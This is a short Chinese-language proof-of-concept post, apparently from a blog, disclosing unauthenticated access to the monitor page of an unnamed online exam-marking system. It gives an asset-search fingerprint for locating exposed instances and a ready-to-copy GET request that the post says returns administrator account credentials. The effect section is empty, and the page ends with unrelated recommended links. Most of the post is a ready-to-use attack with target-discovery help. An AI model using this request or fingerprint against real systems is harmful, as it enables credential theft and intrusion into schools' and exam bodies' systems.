【POC漏洞】XXX网上阅卷系统 monitor 未授权访问

*免责声明:本文仅供安全研究与学习之用,严禁使用本内容进行未经授权的违规渗透测试,遵守网络安全法,共同维护网络安全,违者后果自负。


一、漏洞说明

XXX网上阅卷系统是一款专为教育领域设计的在线阅卷工具,它能够帮助教师和考试机构实现高效、准确的试卷评阅。系统/exam/monitor/index,jsp存在未授权访问,远程攻击者可通过该接口获取用户账号与密码,造成信息泄露。

二、资产识别

资产特征:

复制代码
body="action=\"login_ok.jsp" && body="阅卷"

三、漏洞脚本

复制漏洞脚本:

复制代码
GET /exam/monitor/index.jsp?logname=admin  HTTP/1.1

漏洞效果:

相关推荐
思茂信息9 分钟前
CST 辐射边界反射过高优化方法
网络·emc·emi·cst·仿真软件·电磁仿真
奥莱维24 分钟前
经济型酒店智能客控轻量化方案
大数据·网络·人工智能
不一样的故事12633 分钟前
截止阀的作用
安全·需求分析
电商API_180079052471 小时前
导购比价小程序场景|京东联盟商品详情对接方案|多规格图文拉取技术实操
网络·小程序·网络爬虫
拾光Ծ1 小时前
【Linux网络】网络通信实战:UDP & TCP Socket编程实现Echo Server
linux·网络·网络协议·tcp/ip·udp·线程池
HackTwoHub1 小时前
解锁 AI 红队全新玩法!Claude-Red 攻防 Skill 库,内置 SQLi、XXE、文件上传等 Web 专项 Skill,一键导入快速落地渗透实战
前端·人工智能·web安全·网络安全·自动化·系统安全
灯澜忆梦3 小时前
GO_网络编程---网络协议
网络·网络协议·golang
EasyGBS4 小时前
政务视频资源汇聚:国标GB28181视频平台EasyGBS在“一网统管”中的定位和落地路径
网络·音视频·政务
德迅云安全-上官9 小时前
DDoS 安全防护在企业安全防护中的作用
安全·ddos